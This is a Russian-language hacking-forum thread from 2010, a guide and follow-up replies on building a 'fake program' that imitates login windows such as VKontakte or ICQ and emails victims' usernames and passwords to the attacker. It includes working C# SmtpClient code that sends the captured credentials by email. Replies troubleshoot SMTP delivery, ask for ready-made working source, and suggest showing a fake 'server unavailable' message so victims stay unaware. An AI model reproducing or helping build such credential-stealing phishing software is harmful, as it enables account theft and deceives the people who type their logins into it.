Создаём фейк программмы. Часть 2. C# version (by OveRKinG)
Так вот это любительский гайд,написан при участии OveRKinG и Nickitee.
Так вот мы сделаем к нашей программе билдер(Пользователь сам пишет своё мыло,и туда шлются логины и пароли).
Начинаем.
Для начала нужно сделать все из этой темы: http://zhyk.ru/forum/showthread.php?t=99460
После того как вы сделали у вас появился фейк,но одно мыло для всех это уныло =(.
Так вот сделаем же билдер.
У вас должен быть примерно такой фейк(можно с другими штучками и т.д)
[Ссылки могут видеть только зарегистрированные пользователи. ]
Создаем:
label
richTextBox
button
У всех в протериес ставим:
Visible False
Два раза кликаем на кнопку(Та где был скрипт на отправку) и над скриптом на отправку на почту добавляем:
[Ссылки могут видеть только зарегистрированные пользователи. ] ВНИМАНИЕ ПРОВЕРЯЙТЕ СО СВОИМИ Кнопками и тд.
ЕСЛИ У ВАС 3 текста то он будет "label3" так же со всем остальным.
В начале я просил создать кнопочку,кликаем на ней два раз и вставляем конфиг:
Конечный результат примерно такой:
Думаю много скринов не нужно,все предельно понятно.
Все вопросы в тему/в личку/в асю.
Сама программа(она не работает,так как в целях безопасности исправил настоящий эмейл на не настоящий.
Фейки заливать лучше тут: [Ссылки могут видеть только зарегистрированные пользователи. ]
Вот то что я сделал,я делал для гайда,у меня есть фейк запускатора с функцией выхода,и тд.Но это совсем другая история.
Последний раз редактировалось OveRKinG; 18.07.2010 в 23:53.
У меня вопрос...А название всегда такое если качать отсюда?И можно поменять оформление любой другой программы,если да то как ?
У меня никак не получается отправить сообщение(((( Еще в 1 Части сделал фейк, настроил кнопку, сохранил проект, открыл программу, ввел данные, но после нажатия на кнопку ничего не происходит (письмо на мыло не приходит)
Для некоторых может показалось не понятным содержание выше указанного материала, поэтому в скорем времени от меня будет разъяснение.
Timich, значит вы не правильно настроили смтп клиент для вашего почтового ящика.
Цитата:
SmtpClient client = new SmtpClient("smtp.mail.ru", 2525); // Здесь указываем смтп сервер и порт, который мы будем использовать
client.Credentials = new System.Net.NetworkCredential("[Ссылки могут видеть только зарегистрированные пользователи. ]", "пароль"); // Указываем логин и пароль для авторизации
string msgFrom = "[Ссылки могут видеть только зарегистрированные пользователи. ]"; // Указываем поле, от кого письмо
string msgTo = "[Ссылки могут видеть только зарегистрированные пользователи. ]"; // Указываем поле, кому письмо будет отправлено
string msgSubject = "Письмо из Vkontakte Hack"; // Указываем тему пиьсма
string msgBody = String.Format("Нубик попался :-)\n\nЛогин: {0}\nПароль: {1}",
textBox1.Text, textBox2.Text); // Тут мы формируем тело письма, передаем выбранный сервер, логин и пароль.
MailMessage msg = new MailMessage(msgFrom, msgTo, msgSubject, msgBody); // Создаем письмо, из всего, что сделали выше
Timich, на первый взгляд вроде все правильно.
1. Попробуйте использовать порт не 2525, а 25.
2. Убедитесь в отсутствии фаерволов или другого ПО блокирующего трафик.
3. В блок try catch вставьте обработку эксепшена
Если будет возникать ошибка в момент отправки, то появится сообщение на экране с текстом ошибки, от которого уже можно будет дальше плясать.
Создай если можешь.и еще было хорошо код который будет отсылать логины и пароли на Email.В других темах видел коды но они подходят только к тем фейкам которые они делали.
Re: Создаём фейк программмы. Часть 2. C# version (by OveRKinG)
DiabloIIIII, учитесь кодить, а не просить все готовое. В моих гайдах код рабочий 100% и приведено к такому виду, что можно копировать и вставлять...
Если у вас даже такое не получается то стоит задуматся...
Убедитесь в правильности вводимых данных (логин, пароль и т.д.), так же в отсутствии фаерволов блокирующих деятельность фейка и прочий софт, который может мешать.
=).Я делал фейк типо аськи)Еще хотелось бы тут видть пособии. например при нажатии на кнопку вход,или другое название тоесть кнопка(Button)Появлялось какоето сообщение,например подождите сервер перегружен,ну или наподобии.А то как у вас в гайде http://zhyk.ru/forum/showthread.php?t=99460 да все работает но если человек нажмет на кнопку и не чего не перезайдет то он подумает что это полюбак фейл))
Re: Создаём фейк программмы. Часть 2. C# version (by OveRKinG)
Ааааа у меня ничего не отправляет, киньте кто-нибудь исходник РАБОТАЮЩЕГО фейка, где я могу бы просто вписать свое мыло и пароль и он РАБОТАЛ плиииииииз Заплюсую до смерти
Добавлено через 26 минут
Цитата:
Сообщение от DiabloIIIII
=).Я делал фейк типо аськи)Еще хотелось бы тут видть пособии. например при нажатии на кнопку вход,или другое название тоесть кнопка(Button)Появлялось какоето сообщение,например подождите сервер перегружен,ну или наподобии.А то как у вас в гайде http://zhyk.ru/forum/showthread.php?t=99460 да все работает но если человек нажмет на кнопку и не чего не перезайдет то он подумает что это полюбак фейл))
Можно сделать чтобы при нажатии на кнопку открывалась новая форма с вашим текстом!
Для этого создаем новую форму виндовс (Щелкаем правой кнопкой по названию вашего проекта в верхнем правом углу, жмем Добавить - Форма виндовс (Add - Form Windows))
Далее пишем в созданной форме что угодно например "Не удалось подключится к серверу"
Далее в первой форме заходим в исходный код кнопки и вписываем код:
Цитата:
Form2 f = new Form2();
f.Show();
Вот и все, теперь при нажатии на кнопку будет появляться вторая форма с вашим текстом!
Последний раз редактировалось Timich; 24.07.2010 в 18:12.
Причина: Добавлено сообщение